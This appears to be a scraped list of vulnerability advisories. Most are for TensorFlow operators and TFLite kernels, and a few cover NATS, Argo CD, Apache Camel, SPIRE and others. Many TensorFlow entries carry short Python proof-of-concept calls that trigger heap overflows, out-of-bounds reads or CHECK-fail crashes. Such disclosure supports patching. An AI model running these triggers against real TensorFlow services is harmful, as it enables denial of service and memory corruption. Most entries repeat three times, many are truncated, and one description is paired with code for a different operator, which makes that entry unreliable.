TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices. This is because the implementation does a double redirection to access an element of an array allocated on the heap. If the value at indices + 1 is outside the bounds of csr_row_ptr, this results in writing outside of bounds of …
Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …
Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …
Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap: import tensorflow as tf inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32) labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64) labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32) sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32) tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices, labels_values=labels_values, sequence_length=sequence_length, preprocess_collapse_repeated=True, ctc_merge_repeated=False, ignore_longer_outputs_than_inputs=True) An attacker can also trigger a heap buffer overflow: import tensorflow as tf inputs = tf.constant([], shape=[7, 2, …
Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
Incomplete validation in SparseReshape results in a denial of service based on a CHECK-failure. import tensorflow as tf input_indices = tf.constant(41, shape=[1, 1], dtype=tf.int64) input_shape = tf.zeros([11], dtype=tf.int64) new_shape = tf.zeros([1], dtype=tf.int64) tf.raw_ops.SparseReshape(input_indices=input_indices, input_shape=input_shape, new_shape=new_shape)
Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)
Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)
Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: import tensorflow as tf a_indices = tf.zeros([10, 97], dtype=tf.int64) a_values = tf.zeros([10], dtype=tf.int64) a_shape = tf.zeros([0], dtype=tf.int64) b_indices = tf.zeros([0, 0], dtype=tf.int64) b_values = tf.zeros([0], dtype=tf.int64) b_shape = tf.zeros([0], dtype=tf.int64) thresh = 0 tf.raw_ops.SparseAdd(a_indices=a_indices, a_values=a_values, a_shape=a_shape, b_indices=b_indices, b_values=b_values, b_shape=b_shape, thresh=thresh)
Lotus is an Implementation of the Filecoin protocol written in Go. BLS signature validation in lotus uses blst library method VerifyCompressed. This method accepts signatures in 2 forms: "serialized", and "compressed", meaning that BLS signatures can be provided as either of 2 unique byte arrays. Lotus block validation functions perform a uniqueness check on provided blocks. Two blocks are considered distinct if the CIDs of their blockheader do not match. …
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in github.com/cilium/cilium.
The package github.com/argoproj/argo-cd/cmd before 1.7.13, from 1.8.0 and before 1.8.6 are vulnerable to Cross-site Scripting (XSS) the SSO provider connected to Argo CD would have to send back a malicious error message containing JavaScript to the user.
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
Apache Camel's JMX is vulnerable to Rebind Flaw. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.x, 3.0.0 up to 3.1.0 is affected. Users should upgrade to 3.2.0.
Syncthing is a continuous file synchronization program. In Syncthing before version 1.15.0, the relay server strelaysrv can be caused to crash and exit by sending a relay message with a negative length field. Similarly, Syncthing itself can crash for the same reason if given a malformed message from a malicious relay server when attempting to join the relay. Relay joins are essentially random (from a subset of low latency relays) …
When reading a file, libwebp allocates an excessive amount of memory. The highest threat from this vulnerability is to the service availability.
TensorFlow is an end-to-end open source platform for machine learning. An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.QuantizeAndDequantizeV4Grad. This is because the implementation does not validate the rank of the input_* tensors. In turn, this results in the tensors being passes as they are to QuantizeAndDequantizePerChannelGradientImpl. However, the vec<T> method, requires the rank to 1 and triggers a CHECK failure otherwise. The fix will be …
In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …
In SPIRE 0.8.1 through 0.8.4 and before versions 0.9.4, 0.10.2, 0.11.3 and 0.12.1, specially crafted requests to the FetchX509SVID RPC of SPIRE Server’s Legacy Node API can result in the possible issuance of an X.509 certificate with a URI SAN for a SPIFFE ID that the agent is not authorized to distribute. Proper controls are in place to require that the caller presents a valid agent certificate that is already …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …
Impact If your installation is using the export-importer service, there is potential impact. If your installation is not importing keys via the export-importer services, your installation is not impacted. In versions 0.19.1 and earlier, the export-importer service assumed that the server it was importing from had properly embargoed keys for at least 2 hours after their expiry time. There are now known instances of servers that did not properly embargo …
(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-28466.txt) Problem Description An export/import cycle between accounts could crash the nats-server, after consuming CPU and memory. This issue was fixed publicly in https://github.com/nats-io/nats-server/pull/1731 in November 2020. The need to call this out as a security issue was highlighted by snyk.io and we are grateful for their assistance in doing so. Organizations which run a NATS service providing access to accounts run by untrusted third parties …
Impact When Argo CD was connected to a Helm OCI repository with authentication enabled, the credentials used for accessing the remote repository were logged. Anyone with access to the pod logs - either via access with appropriate permissions to the Kubernetes control plane or a third party log management system where the logs from Argo CD were aggregated - could have potentially obtained the credentials to the Helm OCI repository. …
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[7,8], values= [5, 16, 51, 76, 29, 27, 54, 95],\ size= 59, weights= [0, 0, 0, 0, 0, 0, 0, 0],\ binary_output=False)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([1], shape=[1], dtype=tf.qint32) input_max = tf.constant([], dtype=tf.float32) input_min = tf.constant([], dtype=tf.float32) tf.raw_ops.RequantizationRange(input=input, input_min=input_min, input_max=input_max)
An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to tf.raw_ops.RaggedCross
An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to tf.raw_ops.RaggedCross
An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to tf.raw_ops.RaggedCross
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
The implementation of tf.raw_ops.MaxPoolGradWithArgmax can cause reads outside of bounds of heap allocated data if attacker supplies specially crafted inputs: import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32) argmax = tf.constant([1], shape=[1], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)
An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …
An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …
An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) t_min = tf.constant([], shape=[0], dtype=tf.float32) t_max = tf.constant([], shape=[0], dtype=tf.float32) m = tf.constant([1], shape=[1], dtype=tf.quint8) m_min = tf.constant([], shape=[0], dtype=tf.float32) m_max = tf.constant([], shape=[0], dtype=tf.float32) v = tf.constant([1], shape=[1], dtype=tf.quint8) v_min = tf.constant([], shape=[0], dtype=tf.float32) v_max = tf.constant([], shape=[0], dtype=tf.float32) …
A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …
A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …
A specially crafted TFLite model could trigger an OOB write on heap in the TFLite implementation of ArgMin/ArgMax: TfLiteIntArray* output_dims = TfLiteIntArrayCreate(NumDimensions(input) - 1); int j = 0; for (int i = 0; i < NumDimensions(input); ++i) { if (i != axis_value) { output_dims->data[j] = SizeOfDimension(input, i); ++j; } } If axis_value is not a value between 0 and NumDimensions(input), then the condition in the if is never true, so …
The implementations of the Minimum and Maximum TFLite operators can be used to read data outside of bounds of heap allocated objects, if any of the two input tensor arguments are empty.
The implementations of the Minimum and Maximum TFLite operators can be used to read data outside of bounds of heap allocated objects, if any of the two input tensor arguments are empty.
The implementations of the Minimum and Maximum TFLite operators can be used to read data outside of bounds of heap allocated objects, if any of the two input tensor arguments are empty.
A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }
A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }
A specially crafted TFLite model could trigger an OOB read on heap in the TFLite implementation of Split_V: const int input_size = SizeOfDimension(input, axis_value); If axis_value is not a value between 0 and NumDimensions(input), then the SizeOfDimension function will access data outside the bounds of the tensor shape array: inline int SizeOfDimension(const TfLiteTensor* t, int dim) { return t->dims->data[dim]; }
Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …
Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …
Due to lack of validation in tf.raw_ops.Dequantize, an attacker can trigger a read from outside of bounds of heap allocated data: import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, …
An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)
An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)
An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3: import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3)
Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)
Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)
Due to lack of validation in tf.raw_ops.RaggedTensorToTensor, an attacker can exploit an undefined behavior if input arguments are empty: import tensorflow as tf shape = tf.constant([-1, -1], shape=[2], dtype=tf.int64) values = tf.constant([], shape=[0], dtype=tf.int64) default_value = tf.constant(404, dtype=tf.int64) row = tf.constant([269, 404, 0, 0, 0, 0, 0], shape=[7], dtype=tf.int64) rows = [row] types = ['ROW_SPLITS'] tf.raw_ops.RaggedTensorToTensor( shape=shape, values=values, default_value=default_value, row_partition_tensors=rows, row_partition_types=types)
An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)
An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)
An attacker can access data outside of bounds of heap allocated array in tf.raw_ops.UnicodeEncode: import tensorflow as tf input_values = tf.constant([58], shape=[1], dtype=tf.int32) input_splits = tf.constant([[81, 101, 0]], shape=[3], dtype=tf.int32) output_encoding = "UTF-8" tf.raw_ops.UnicodeEncode( input_values=input_values, input_splits=input_splits, output_encoding=output_encoding)
An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
An attacker can write outside the bounds of heap allocated arrays by passing invalid arguments to tf.raw_ops.Dilation2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([1.1] * 81, shape=[3, 3, 3, 3], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 3], dtype=tf.float32) out_backprop = tf.constant([1.1] * 1062, shape=[3, 2, 59, 3], dtype=tf.float32) tf.raw_ops.Dilation2DBackpropInput( input=input_tensor, filter=filter, out_backprop=out_backprop, strides=[1, 40, 1, 1], rates=[1, 56, 56, 1], padding='VALID')
An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams: import tensorflow as tf separator = b'\x02\x00' ngram_widths = [7, 6, 11] left_pad = b'\x7f\x7f\x7f\x7f\x7f' right_pad = b'\x7f\x7f\x25\x5d\x53\x74' pad_width = 50 preserve_short_sequences = True l = ['', '', '', '', '', '', '', '', '', '', ''] data = tf.constant(l, shape=[11], dtype=tf.string) l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)
An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices: import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] st = tf.SparseTensor(indices_array, value_array, dense_shape) values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix( st.indices, st.values, st.dense_shape)
An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)
An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)
An attacker can cause a heap buffer overflow in tf.raw_ops.SparseSplit: import tensorflow as tf shape_dims = tf.constant(0, dtype=tf.int64) indices = tf.ones([1, 1], dtype=tf.int64) values = tf.ones([1], dtype=tf.int64) shape = tf.ones([1], dtype=tf.int64) tf.raw_ops.SparseSplit( split_dim=shape_dims, indices=indices, values=values, shape=shape, num_split=1)
An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
An attacker can cause a heap buffer overflow in tf.raw_ops.RaggedTensorToTensor: import tensorflow as tf shape = tf.constant([10, 10], shape=[2], dtype=tf.int64) values = tf.constant(0, shape=[1], dtype=tf.int64) default_value = tf.constant(0, dtype=tf.int64) l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, …
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)
If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)
